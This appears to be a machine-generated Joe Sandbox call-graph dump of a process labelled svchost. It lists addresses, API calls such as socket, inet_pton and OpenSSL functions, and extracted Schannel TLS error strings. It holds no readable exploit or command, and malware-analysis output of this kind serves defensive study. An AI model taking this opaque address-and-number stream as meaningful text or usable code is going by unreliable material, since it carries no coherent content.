7ff8b8374b60 18 API calls 117634->117637 117638 7ff8b8367db4 setsockopt 117635->117638 117636->117592 117659 7ff8b8367f90 34 API calls 117636->117659 117637->117635 117638->117628 117640 7ff8b8367ddd WSAGetLastError 117638->117640 117640->117622 117641 7ff8b8367ee0 117642 7ff8b83b3b60 2 API calls 117641->117642 117642->117592 117644 7ff8b8368321 WSAGetLastError 117643->117644 117645 7ff8b83660e3 117643->117645 117644->117645 117645->117558 117645->117573 117646->117572 117647->117558 117648->117570 117649->117577 117650->117584 117652 7ff8b836827a socket 117651->117652 117653 7ff8b8368252 117651->117653 117652->117653 117653->117590 117654->117594 117655->117604 117656->117591 117657->117617 117658->117630 117659->117641 117660 7ff8b8377dc0 117661 7ff8b8377dfe free 117660->117661 117662 7ff8b8377e1e 117660->117662 117666 7ff8b8377ea2 117661->117666 117663 7ff8b8377e85 117662->117663 117664 7ff8b8377e57 realloc 117662->117664 117663->117666 117667 7ff8b8377e91 memmove 117663->117667 117664->117663 117665 7ff8b8377e68 free 117664->117665 117665->117666 117667->117666 117668 7ff8b83783c0 117669 7ff8b83783c5 117668->117669 117670 7ff8b83783e0 117668->117670 117669->117670 117672 7ff8b83b53c0 117669->117672 117673 7ff8b83b570b 117672->117673 117675 7ff8b83b53cf 117672->117675 117673->117670 117674 7ff8b83b5420 117679 7ff8b83b5447 117674->117679 117680 7ff8b83b543a free 117674->117680 117675->117673 117675->117674 117676 7ff8b83b540f 117675->117676 117733 7ff8b8399180 47 API calls 117675->117733 117676->117674 117716 7ff8b8398810 117676->117716 117734 7ff8b83a00f0 free free free free 117679->117734 117680->117679 117717 7ff8b839883f 117716->117717 117720 7ff8b839882a 117716->117720 117717->117674 117718 7ff8b8398969 117735 7ff8b836a2c0 117718->117735 117720->117717 117720->117718 117726 7ff8b83998c0 47 API calls 117720->117726 117721 7ff8b8398975 117722 7ff8b83989ad 117721->117722 117743 7ff8b8382f80 free 117721->117743 117744 7ff8b8382f80 free 117722->117744 117725 7ff8b83989b9 117745 7ff8b8382f80 free 117725->117745 117726->117720 117728 7ff8b83989c5 117746 7ff8b8382f80 free 117728->117746 117730 7ff8b83989d1 WSACloseEvent 117747 7ff8b839ba90 free free 117730->117747 117732 7ff8b83989e6 free 117732->117674 117733->117676 117736 7ff8b836a2c5 117735->117736 117737 7ff8b836a30d 117735->117737 117738 7ff8b836a305 117736->117738 117748 7ff8b836b340 117736->117748 117737->117721 117756 7ff8b8382f80 free 117738->117756 117741 7ff8b836a2de 117742 7ff8b83b53c0 180 API calls 117741->117742 117742->117738 117743->117721 117744->117725 117745->117728 117746->117730 117747->117732 117755 7ff8b836b34e 117748->117755 117749 7ff8b836b3bd 117757 7ff8b836bb60 48 API calls 117749->117757 117751 7ff8b836b495 117758 7ff8b836bd70 31 API calls 117751->117758 117753 7ff8b836b49d 117753->117741 117754 7ff8b836b4c0 37 API calls 117754->117755 117755->117749 117755->117754 117756->117737 117757->117751 117758->117753 117759 7ff8b83789e0 117760 7ff8b83789ef 117759->117760 117761 7ff8b83789fb 117759->117761 117762 7ff8b8378a1b 117761->117762 117763 7ff8b8378a33 117761->117763 117793 7ff8b8374a70 14 API calls 117762->117793 117765 7ff8b8378a44 117763->117765 117771 7ff8b8378a72 117763->117771 117794 7ff8b8397a80 183 API calls 117765->117794 117766 7ff8b8378a27 117768 7ff8b8378a7b 117769 7ff8b8378a59 117770 7ff8b8378a61 117769->117770 117769->117771 117771->117768 117772 7ff8b8378abd 117771->117772 117776 7ff8b8378ae8 117771->117776 117773 7ff8b8398810 180 API calls 117772->117773 117774 7ff8b8378ac5 117773->117774 117775 7ff8b8378b42 117795 7ff8b8399180 47 API calls 117775->117795 117776->117775 117780 7ff8b8398eb0 117776->117780 117778 7ff8b8378b62 117781 7ff8b83b3b60 2 API calls 117780->117781 117785 7ff8b8398ee7 117781->117785 117782 7ff8b83c9e10 8 API calls 117783 7ff8b8399135 117782->117783 117783->117776 117787 7ff8b8398f0c 117785->117787 117791 7ff8b8398f70 117785->117791 117796 7ff8b8399e10 117785->117796 117787->117782 117788 7ff8b836cfb0 10 API calls 117788->117791 117789 7ff8b8374a70 14 API calls 117789->117791 117790 7ff8b8374b60 18 API calls 117790->117791 117791->117787 117791->117788 117791->117789 117791->117790 117792 7ff8b83998c0 47 API calls 117791->117792 117810 7ff8b83adda0 8 API calls 117791->117810 117792->117791 117793->117766 117794->117769 117795->117778 117797 7ff8b8399e50 117796->117797 117798 7ff8b839b186 117796->117798 117797->117798 117799 7ff8b83998c0 47 API calls 117797->117799 117803 7ff8b8399eaf 117797->117803 117798->117785 117800 7ff8b8399e86 117799->117800 117800->117803 117811 7ff8b839ba90 free free 117800->117811 117801 7ff8b836cfb0 10 API calls 117801->117803 117803->117801 117804 7ff8b8374a70 14 API calls 117803->117804 117805 7ff8b83998c0 47 API calls 117803->117805 117807 7ff8b839b0e4 117803->117807 117808 7ff8b836a330 41 API calls 117803->117808 117809 7ff8b839ba90 free free 117803->117809 117812 7ff8b839f2d0 16 API calls 117803->117812 117804->117803 117805->117803 117807->117785 117808->117803 117809->117803 117810->117791 117811->117803 117812->117803 117813 7ff8b83849e0 117819 7ff8b8384a30 117813->117819 117814 7ff8b8384a87 117845 7ff8b83850c0 117814->117845 117817 7ff8b8384a73 117857 7ff8b8374a70 14 API calls 117817->117857 117819->117814 117819->117817 117820 7ff8b8384a82 117824 7ff8b83c9e10 8 API calls 117820->117824 117821 7ff8b8374b60 18 API calls 117828 7ff8b8384ade 117821->117828 117822 7ff8b8384b49 inet_pton 117823 7ff8b8384b67 inet_pton 117822->117823 117829 7ff8b8384b61 117822->117829 117826 7ff8b8384c0d 117823->117826 117823->117829 117825 7ff8b8384f23 117824->117825 117827 7ff8b8384c2e 117826->117827 117830 7ff8b83843b0 2 API calls 117826->117830 117827->117820 117834 7ff8b8384d0d htons inet_pton 117827->117834 117836 7ff8b8384ca0 117827->117836 117828->117820 117828->117822 117829->117820 117831 7ff8b8384baa 117829->117831 117830->117827 117858 7ff8b8383e50 29 API calls 117831->117858 117833 7ff8b8384bd8 117837 7ff8b8384c00 117833->117837 117860 7ff8b83852d0 22 API calls SimpleString::operator= 117833->117860 117835 7ff8b8384d4e calloc 117834->117835 117834->117836 117839 7ff8b8384d73 117835->117839 117842 7ff8b8384d6b 117835->117842 117836->117820 117836->117829 117843 7ff8b8384ea3 117836->117843 117837->117820 117839->117839 117840 7ff8b8384dd9 calloc 117839->117840 117841 7ff8b8384df4 htons inet_pton 117840->117841 117840->117842 117841->117842 117842->117836 117842->117842 117843->117820 117859 7ff8b83852d0 22 API calls SimpleString::operator= 117843->117859 117846 7ff8b83850f0 117845->117846 117847 7ff8b8394eb0 8 API calls 117846->117847 117848 7ff8b838512e 117847->117848 117853 7ff8b8394eb0 8 API calls 117848->117853 117855 7ff8b838518d 117848->117855 117856 7ff8b83851ec 117848->117856 117849 7ff8b83851bd _time64 117851 7ff8b83851ce 117849->117851 117850 7ff8b83c9e10 8 API calls 117852 7ff8b8384ac3 117850->117852 117854 7ff8b8374b60 18 API calls 117851->117854 117851->117856 117852->117821 117852->117828 117853->117855 117854->117856 117855->117849 117855->117851 117855->117856 117856->117850 117857->117820 117858->117833 117859->117820 117860->117820 117861 7ff8b839aa52 117862 7ff8b839aa68 117861->117862 117863 7ff8b839aac8 117862->117863 117865 7ff8b839ad04 117862->117865 117907 7ff8b83b4870 117863->117907 117866 7ff8b839ad63 117865->117866 117867 7ff8b839ad2f 117865->117867 117869 7ff8b83b3b60 2 API calls 117866->117869 117868 7ff8b83b3b60 2 API calls 117867->117868 117877 7ff8b839ad38 117868->117877 117869->117877 117870 7ff8b839aad7 117871 7ff8b839acb7 117870->117871 117872 7ff8b839ab02 117870->117872 117873 7ff8b83998c0 47 API calls 117871->117873 117874 7ff8b839ac63 117872->117874 117876 7ff8b839ab1f 117872->117876 117875 7ff8b839acf0 free 117873->117875 117874->117875 117878 7ff8b839ac7c 117874->117878 117875->117877 117879 7ff8b839ac0f 117876->117879 117880 7ff8b839ab35 117876->117880 117881 7ff8b839abea free 117876->117881 117882 7ff8b836cfb0 10 API calls 117877->117882 117900 7ff8b8399ee0 117877->117900 117883 7ff8b83b3b60 2 API calls 117878->117883 117886 7ff8b83998c0 47 API calls 117879->117886 117884 7ff8b839ab8d free 117880->117884 117885 7ff8b839ab3e free 117880->117885 117881->117879 117882->117900 117888 7ff8b839ac85 117883->117888 117884->117877 117928 7ff8b83b3d80 41 API calls 117885->117928 117891 7ff8b839ac21 117886->117891 117892 7ff8b839aca3 free 117888->117892 117929 7ff8b83b3d80 41 API calls 117891->117929 117892->117877 117893 7ff8b839ab6a 117893->117884 117897 7ff8b83998c0 47 API calls 117893->117897 117895 7ff8b836cfb0 10 API calls 117895->117900 117896 7ff8b839ac31 117896->117875 117899 7ff8b839ac3c free 117896->117899 117901 7ff8b839ab82 117897->117901 117898 7ff8b839b0e4 117899->117877 117900->117895 117900->117898 117903 7ff8b8374a70 14 API calls 117900->117903 117904 7ff8b836a330 41 API calls 117900->117904 117905 7ff8b839ba90 free free 117900->117905 117906 7ff8b83998c0 47 API calls 117900->117906 117930 7ff8b839f2d0 16 API calls 117900->117930 117901->117875 117901->117884 117903->117900 117904->117900 117905->117900 117906->117900 117908 7ff8b83b48a3 117907->117908 117910 7ff8b83b48e5 117908->117910 117913 7ff8b83b49e4 117908->117913 117931 7ff8b83b5010 117908->117931 117910->117913 117941 7ff8b839f2d0 16 API calls 117910->117941 117912 7ff8b83b4954 117912->117913 117942 7ff8b83adb30 14 API calls 117912->117942 117913->117870 117915 7ff8b83b4972 117915->117913 117916 7ff8b83b4a42 117915->117916 117917 7ff8b83b4985 117915->117917 117918 7ff8b83b4a80 117916->117918 117922 7ff8b83b4a67 117916->117922 117919 7ff8b836cfb0 10 API calls 117917->117919 117946 7ff8b839f2d0 16 API calls 117918->117946 117920 7ff8b83b4993 117919->117920 117920->117913 117923 7ff8b83b49b0 117920->117923 117924 7ff8b83b4a0c 117920->117924 117945 7ff8b8374a70 14 API calls 117922->117945 117943 7ff8b8374a70 14 API calls 117923->117943 117944 7ff8b8374a70 14 API calls 117924->117944 117928->117893 117929->117896 117930->117900 117947 7ff8b8398030 117931->117947 117933 7ff8b83b5263 117933->117910 117934 7ff8b83b505d 117934->117933 117937 7ff8b83b51d8 117934->117937 117965 7ff8b83b4bd0 117934->117965 117969 7ff8b83b4f60 18 API calls 117934->117969 117937->117933 117938 7ff8b8374b60 18 API calls 117937->117938 117939 7ff8b83b525b 117938->117939 117970 7ff8b83a0010 20 API calls 117939->117970 117941->117912 117942->117915 117943->117913 117944->117913 117945->117913 117946->117913 117948 7ff8b8398061 117947->117948 117949 7ff8b839807a 117947->117949 117971 7ff8b8374a70 14 API calls 117948->117971 117951 7ff8b8398084 117949->117951 117952 7ff8b839809d 117949->117952 117972 7ff8b8374a70 14 API calls 117951->117972 117953 7ff8b83980a6 117952->117953 117954 7ff8b83980bf 117952->117954 117973 7ff8b8374a70 14 API calls 117953->117973 117958 7ff8b83980f9 117954->117958 117959 7ff8b83980d4 free 117954->117959 117955 7ff8b8398070 117955->117934 117958->117955 117960 7ff8b8398109 malloc 117958->117960 117959->117958 117961 7ff8b8398152 117960->117961 117962 7ff8b8398139 117960->117962 117961->117955 117974 7ff8b8374a70 14 API calls 117962->117974 117964 7ff8b839814b 117964->117955 117966 7ff8b83b4bfd 117965->117966 117968 7ff8b83b4cb9 117966->117968 117975 7ff8b83696b0 117966->117975 117968->117934 117969->117934 117970->117933 117971->117955 117972->117955 117973->117955 117974->117964 117978 7ff8b83c3c50 117975->117978 117983 7ff8b83bf4f0 117978->117983 117980 7ff8b8374bb0 14 API calls 117981 7ff8b83696d5 117980->117981 117981->117968 117984 7ff8b83bf550 117983->117984 117987 7ff8b83bf56a 117983->117987 117985 7ff8b83bf556 117984->117985 117984->117987 117986 7ff8b8374b60 18 API calls 117985->117986 117992 7ff8b83bf565 117986->117992 117989 7ff8b83bf5c2 realloc 117987->117989 117990 7ff8b83bf5fe 117987->117990 118016 7ff8b83bf571 117987->118016 118017 7ff8b83bf651 117987->118017 117988 7ff8b8374b60 18 API calls 117988->117992 117989->117990 117991 7ff8b83bf5e2 117989->117991 117999 7ff8b83bf653 117990->117999 118000 7ff8b83bf645 117990->118000 117990->118017 118018 7ff8b8374a70 14 API calls 117991->118018 117995 7ff8b83bf8fd 117992->117995 118001 7ff8b8374b60 18 API calls 117992->118001 117993 7ff8b83bf9c8 memmove memmove 117996 7ff8b83bf9fe 117993->117996 117995->117993 117995->117996 117997 7ff8b83c9e10 8 API calls 117996->117997 117998 7ff8b83bfa37 117997->117998 117998->117980 118002 7ff8b8374b60 18 API calls 117999->118002 118003 7ff8b8374b60 18 API calls 118000->118003 118001->117995 118002->118017 118003->118017 118004 7ff8b83bf906 118007 7ff8b83bf92d 118004->118007 118004->118016 118005 7ff8b83bf764 realloc 118006 7ff8b83bf95d 118005->118006 118005->118017 118034 7ff8b8374a70 14 API calls 118006->118034 118008 7ff8b83ae4c0 17 API calls 118007->118008 118013 7ff8b83bf93e 118008->118013 118010 7ff8b83bf797 memmove 118010->118017 118011 7ff8b83bf7cb memmove 118011->118017 118012 7ff8b8374b60 18 API calls 118012->118017 118014 7ff8b8374b60 18 API calls 118013->118014 118014->117992 118016->117988 118017->117992 118017->118004 118017->118005 118017->118010 118017->118011 118017->118012 118017->118016 118019 7ff8b83c1420 118017->118019 118018->117992 118020 7ff8b83c144e 118019->118020 118021 7ff8b836cfb0 10 API calls 118020->118021 118028 7ff8b83c1457 118020->118028 118029 7ff8b83c148e 118020->118029 118023 7ff8b83c147a 118021->118023 118022 7ff8b836cfb0 10 API calls 118022->118029 118025 7ff8b83c1552 118023->118025 118035 7ff8b83c15d0 118023->118035 118025->118028 118129 7ff8b8374a70 14 API calls 118025->118129 118028->118017 118029->118022 118029->118025 118029->118028 118031 7ff8b83c155c WSAGetLastError 118029->118031 118033 7ff8b83c1516 118029->118033 118078 7ff8b83c1a60 118029->118078 118128 7ff8b8374a70 14 API calls 118031->118128 118033->118028 118127 7ff8b83c20b0 45 API calls 118033->118127 118034->117992 118036 7ff8b83c1613 118035->118036 118037 7ff8b83c165e 118036->118037 118038 7ff8b8374b60 18 API calls 118036->118038 118039 7ff8b83c1664 GetModuleHandleW GetProcAddress 118037->118039 118041 7ff8b83c16ae 118037->118041 118038->118037 118040 7ff8b83c1686 118039->118040 118039->118041 118040->118041 118042 7ff8b83c1a1c 118041->118042 118046 7ff8b83c16bf 118041->118046 118138 7ff8b8374a70 14 API calls 118042->118138 118044 7ff8b83c17ba 118045 7ff8b83c9e10 8 API calls 118044->118045 118047 7ff8b83c1a3f 118045->118047 118046->118044 118048 7ff8b83c1785 118046->118048 118049 7ff8b8374b60 18 API calls 118046->118049 118047->118029 118050 7ff8b83c183b 118048->118050 118130 7ff8b83c4040 memmove 118048->118130 118049->118048 118052 7ff8b83c1839 118050->118052 118053 7ff8b83c188e calloc 118050->118053 118052->118050 118052->118053 118055 7ff8b83c18c3 118053->118055 118056 7ff8b83c18aa 118053->118056 118054 7ff8b83c17a3 118057 7ff8b83c17c4 memmove 118054->118057 118058 7ff8b83c17ab 118054->118058 118063 7ff8b83c1926 free 118055->118063 118073 7ff8b83c199d 118055->118073 118133 7ff8b8374a70 14 API calls 118056->118133 118061 7ff8b83c17e3 118057->118061 118131 7ff8b8374a70 14 API calls 118058->118131 118132 7ff8b83c4100 memmove 118061->118132 118065 7ff8b83ae4c0 17 API calls 118063->118065 118064 7ff8b83c1826 118067 7ff8b8374b60 18 API calls 118064->118067 118066 7ff8b83c1945 118065->118066 118068 7ff8b83c1953 118066->118068 118069 7ff8b83c1987 118066->118069 118067->118052 118070 7ff8b83c1971 118068->118070 118071 7ff8b83c195b 118068->118071 118136 7ff8b8374a70 14 API calls 118069->118136 118135 7ff8b8374a70 14 API calls 118070->118135 118134 7ff8b8374a70 14 API calls 118071->118134 118076 7ff8b83c1967 118073->118076 118137 7ff8b8374a70 14 API calls 118073->118137 118076->118044 118079 7ff8b83c1a9e 118078->118079 118080 7ff8b83c1ae3 malloc 118079->118080 118081 7ff8b83c1b0b 118079->118081 118103 7ff8b83c2061 118079->118103 118080->118081 118080->118103 118082 7ff8b83c1b14 malloc 118081->118082 118083 7ff8b83c1b3e 118081->118083 118082->118083 118082->118103 118084 7ff8b83c1b51 realloc 118083->118084 118087 7ff8b83c1baa 118083->118087 118085 7ff8b83c1b66 118084->118085 118084->118087 118139 7ff8b8374a70 14 API calls 118085->118139 118093 7ff8b83c1de2 118087->118093 118102 7ff8b83c1bfa 118087->118102 118087->118103 118088 7ff8b83c1c0a malloc 118091 7ff8b83c1c9e memmove 118088->118091 118088->118103 118089 7ff8b83c1b75 118090 7ff8b83c9e10 8 API calls 118089->118090 118092 7ff8b83c1b99 118090->118092 118095 7ff8b83c1cff free 118091->118095 118092->118029 118140 7ff8b8374a70 14 API calls 118093->118140 118095->118102 118095->118103 118096 7ff8b83c1df1 118141 7ff8b8374a70 14 API calls 118096->118141 118097 7ff8b83ae4c0 17 API calls 118104 7ff8b83c1ff2 118097->118104 118099 7ff8b83c204b 118149 7ff8b8374a70 14 API calls 118099->118149 118101 7ff8b83c2035 118148 7ff8b8374a70 14 API calls 118101->118148 118102->118088 118102->118096 118109 7ff8b83c1dbd memmove 118102->118109 118110 7ff8b83c1de0 118102->118110 118111 7ff8b83c1f8b 118102->118111 118104->118099 118104->118101 118105 7ff8b83c201f 118104->118105 118146 7ff8b8374a70 14 API calls 118104->118146 118147 7ff8b8374a70 14 API calls 118105->118147 118109->118102 118109->118110 118110->118103 118110->118111 118112 7ff8b83c1f3e 118110->118112 118113 7ff8b83c1eb1 118110->118113 118111->118097 118111->118103 118114 7ff8b83ae4c0 17 API calls 118112->118114 118116 7ff8b83c1ec7 memset 118113->118116 118120 7ff8b83c1f2b 118113->118120 118115 7ff8b83c1f52 118114->118115 118144 7ff8b8374a70 14 API calls 118115->118144 118123 7ff8b83c1eec 118116->118123 118118 7ff8b83c1f6e CertFreeCertificateContext 118119 7ff8b83c1f74 118118->118119 118119->118111 118145 7ff8b8374a70 14 API calls 118119->118145 118120->118118 118120->118119 118122 7ff8b83c1f2d 118143 7ff8b8374a70 14 API calls 118122->118143 118123->118120 118123->118122 118125 7ff8b83c1f08 118123->118125 118125->118120 118142 7ff8b8374a70 14 API calls 118125->118142 118127->118028 118128->118028 118129->118028 118130->118054 118131->118044 118132->118064 118133->118044 118134->118076 118135->118076 118136->118076 118137->118076 118138->118044 118139->118089 118140->118096 118141->118110 118142->118120 118143->118120 118144->118120 118145->118111 118146->118105 118147->118101 118148->118099 118149->118103 118150 7ff8b83c3990 118151 7ff8b83c39c3 118150->118151 118153 7ff8b83c39b8 118150->118153 118152 7ff8b8374bb0 14 API calls 118151->118152 118151->118153 118154 7ff8b83c3a26 118152->118154 118155 7ff8b83c3ad6 118154->118155 118156 7ff8b83c3a58 118154->118156 118162 7ff8b83c3b47 118154->118162 118157 7ff8b83c3af0 118155->118157 118158 7ff8b83c3ada 118155->118158 118159 7ff8b83c3a80 118156->118159 118160 7ff8b83c3a5f 118156->118160 118163 7ff8b83c3b1b 118157->118163 118166 7ff8b83c3b05 118157->118166 118174 7ff8b8374a70 14 API calls 118158->118174 118169 7ff8b83c3a6e 118159->118169 118173 7ff8b8374a70 14 API calls 118159->118173 118172 7ff8b8374a70 14 API calls 118160->118172 118165 7ff8b8374bb0 14 API calls 118162->118165 118171 7ff8b83c1420 73 API calls 118163->118171 118165->118153 118175 7ff8b8374a70 14 API calls 118166->118175 118169->118162 118170 7ff8b83b3b60 2 API calls 118169->118170 118170->118162 118171->118169 118172->118169 118173->118169 118174->118169 118175->118169 118176 7ff8a92edaa0 118177 7ff8a935edf0 118176->118177 118178 7ff8a92edaae CRYPTO_zalloc 118177->118178 118179 7ff8a92edad6 118178->118179 118180 7ff8a92edade CRYPTO_THREAD_lock_new 118178->118180 118181 7ff8a92edb03 CRYPTO_new_ex_data 118180->118181 118182 7ff8a92edb2d CRYPTO_free 118180->118182 118183 7ff8a92edb20 CRYPTO_THREAD_lock_free 118181->118183 118189 7ff8a92edbe1 118181->118189 118184 7ff8a92edb45 ERR_new ERR_set_debug ERR_set_error 118182->118184 118183->118182 118185 7ff8a92edbc8 118184->118185 118186 7ff8a92edb78 118184->118186 118186->118185 118187 7ff8a92edb84 CRYPTO_free_ex_data 118186->118187 118188 7ff8a92edb9b 118187->118188 118214 7ff8a92e3a70 89 API calls 118188->118214 118190 7ff8a92edc3f OPENSSL_sk_dup 118189->118190 118192 7ff8a92edcd3 118190->118192 118193 7ff8a92edca0 ERR_new ERR_set_debug ERR_set_error 118190->118193 118215 7ff8a92dcb70 41 API calls 118192->118215 118193->118186 118194 7ff8a92edbaa CRYPTO_THREAD_lock_free CRYPTO_free 118194->118185 118196 7ff8a92edcdf 118196->118184 118196->118186 118197 7ff8a92edd73 X509_VERIFY_PARAM_new 118196->118197 118198 7ff8a92eddef X509_VERIFY_PARAM_inherit 118197->118198 118199 7ff8a92eddbc ERR_new ERR_set_debug ERR_set_error 118197->118199 118200 7ff8a92ede03 118198->118200 118199->118186 118201 7ff8a92edf09 118200->118201 118202 7ff8a92eded8 CRYPTO_memdup 118200->118202 118203 7ff8a92edf57 118201->118203 118204 7ff8a92edf23 CRYPTO_memdup 118201->118204 118202->118186 118202->118201 118205 7ff8a92edf75 CRYPTO_malloc 118203->118205 118207 7ff8a92edfca 118203->118207 118204->118186 118204->118203 118205->118186 118206 7ff8a92edfa6 memcpy 118205->118206 118206->118207 118207->118184 118208 7ff8a92ee0c2 CRYPTO_memdup 118207->118208 118209 7ff8a92ee0eb 118207->118209 118208->118184 118208->118209 118210 7ff8a92ee105 CRYPTO_memdup 118209->118210 118211 7ff8a92ee12e 118209->118211 118210->118184 118210->118211 118211->118184 118211->118185 118212 7ff8a92ee1b5 118211->118212 118213 7ff8a92ee182 ERR_new ERR_set_debug ERR_set_error 118211->118213 118212->118184 118212->118185 118213->118184 118214->118194 118215->118196 118216 7ff8a7f91e28 118217 7ff8a7f91e33 118216->118217 118218 7ff8a7f91e4c 118217->118218 118220 7ff8a7f91e52 118217->118220 118225 7ff8a7fad9b0 118217->118225 118221 7ff8a7f91e5d 118220->118221 118228 7ff8a7f8f408 104 API calls 2 library calls 118220->118228 118229 7ff8a7f02b90 104 API calls 3 library calls 118221->118229 118224 7ff8a7f91e63 std::_Facet_Register 118230 7ff8a7fada00 118225->118230 118227 7ff8a7fad9c2 118227->118217 118229->118224 118235 7ff8a7faccb0 EnterCriticalSection 118230->118235 118232 7ff8a7fada0d 118233 7ff8a7facd04 std::_Locinfo::_Locinfo_ctor LeaveCriticalSection 118232->118233 118234 7ff8a7fada2e 118233->118234 118234->118227 118236 7ff8b8368cd0 118240 7ff8b8368d1b 118236->118240 118245 7ff8b8368d0e 118236->118245 118237 7ff8b8368dd5 118238 7ff8b8368e7b 118237->118238 118241 7ff8b8368de0 118237->118241 118286 7ff8b8369a80 8 API calls 118238->118286 118240->118245 118248 7ff8b836c530 118240->118248 118263 7ff8b8364e50 118240->118263 118241->118245 118285 7ff8b8369a80 8 API calls 118241->118285 118243 7ff8b8368e52 118244 7ff8b83b3b60 2 API calls 118243->118244 118244->118245 118249 7ff8b836c557 118248->118249 118255 7ff8b836c569 118248->118255 118249->118237 118250 7ff8b836c608 118250->118237 118251 7ff8b836c5f3 118254 7ff8b8374bb0 14 API calls 118251->118254 118252 7ff8b836c621 calloc 118253 7ff8b836c8a6 118252->118253 118258 7ff8b836c646 118252->118258 118256 7ff8b836c8ab free free 118253->118256 118254->118250 118255->118250 118255->118251 118255->118252 118257 7ff8b836c8cc 118255->118257 118255->118258 118287 7ff8b83c4270 free free calloc calloc free 118255->118287 118289 7ff8b83c41c0 free free calloc calloc free 118255->118289 118256->118250 118290 7ff8b8374a70 14 API calls 118257->118290 118258->118250 118258->118255 118258->118256 118288 7ff8b8364da0 calloc free free 118258->118288 118264 7ff8b8364e81 118263->118264 118265 7ff8b8364e70 118263->118265 118266 7ff8b83b3b60 2 API calls 118264->118266 118265->118237 118267 7ff8b8364e93 118266->118267 118268 7ff8b8374bb0 14 API calls 118267->118268 118281 7ff8b8364e9c 118267->118281 118269 7ff8b8364ee2 118268->118269 118270 7ff8b8364eec 118269->118270 118271 7ff8b8364f29 118269->118271 118291 7ff8b8365aa0 6 API calls 118270->118291 118271->118281 118292 7ff8b8365aa0 6 API calls 118271->118292 118273 7ff8b8374bb0 14 API calls 118275 7ff8b836519c 118273->118275 118275->118237 118276 7ff8b8365028 118293 7ff8b8365aa0 6 API calls 118276->118293 118278 7ff8b8374bb0 14 API calls 118279 7ff8b836508b 118278->118279 118280 7ff8b8374bb0 14 API calls 118279->118280 118284 7ff8b8364ea5 118279->118284 118280->118284 118281->118276 118282 7ff8b8374bb0 14 API calls 118281->118282 118283 7ff8b836504d 118281->118283 118281->118284 118282->118276 118283->118278 118283->118279 118284->118273 118285->118243 118286->118245 118287->118255 118288->118258 118289->118255 118290->118250 118291->118281 118292->118281 118293->118283 118294 7ff8b836c0b0 118295 7ff8b836c0f1 118294->118295 118297 7ff8b836c0e6 118294->118297 118299 7ff8b836c0fb 118295->118299 118324 7ff8b836dd20 16 API calls 118295->118324 118296 7ff8b83c9e10 8 API calls 118301 7ff8b836c253 118296->118301 118297->118296 118299->118297 118308 7ff8b836d570 118299->118308 118303 7ff8b836d280 3 API calls 118304 7ff8b836c17b 118303->118304 118305 7ff8b839ef80 2 API calls 118304->118305 118306 7ff8b836c1a2 118304->118306 118305->118306 118306->118297 118307 7ff8b8374bb0 14 API calls 118306->118307 118307->118297 118323 7ff8b836d5d0 118308->118323 118309 7ff8b83b3b60 2 API calls 118309->118323 118310 7ff8b8374bb0 14 API calls 118310->118323 118311 7ff8b836db9c 118312 7ff8b8374bb0 14 API calls 118311->118312 118319 7ff8b836c13a 118311->118319 118316 7ff8b836dbc3 118312->118316 118313 7ff8b836d709 WSASetLastError 118313->118323 118314 7ff8b836dcbc 118326 7ff8b8374a70 14 API calls 118314->118326 118315 7ff8b8374bb0 14 API calls 118315->118316 118316->118315 118320 7ff8b836dc0d 118316->118320 118317 7ff8b8374b60 18 API calls 118317->118323 118319->118297 118319->118303 118325 7ff8b8374a70 14 API calls 118320->118325 118322 7ff8b836d0d0 16 API calls 118322->118323 118323->118309 118323->118310 118323->118311 118323->118313 118323->118314 118323->118317 118323->118319 118323->118322 118324->118299 118325->118319 118326->118319
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressHandleModuleProcfree
                                                                                                                                                                                • String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                                                                                                                                                                • API String ID: 3799942571-230586194
                                                                                                                                                                                • Opcode ID: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
                                                                                                                                                                                • Instruction ID: 5bbf95410e6a8636395a815a28a23e0e672b1a8aab50f28a52c3b5dac5812bd9
                                                                                                                                                                                • Opcode Fuzzy Hash: 64750cf7fc75ecf1a52b74ce0a571676b61e8a684627b3f2986ccd449495d6e1
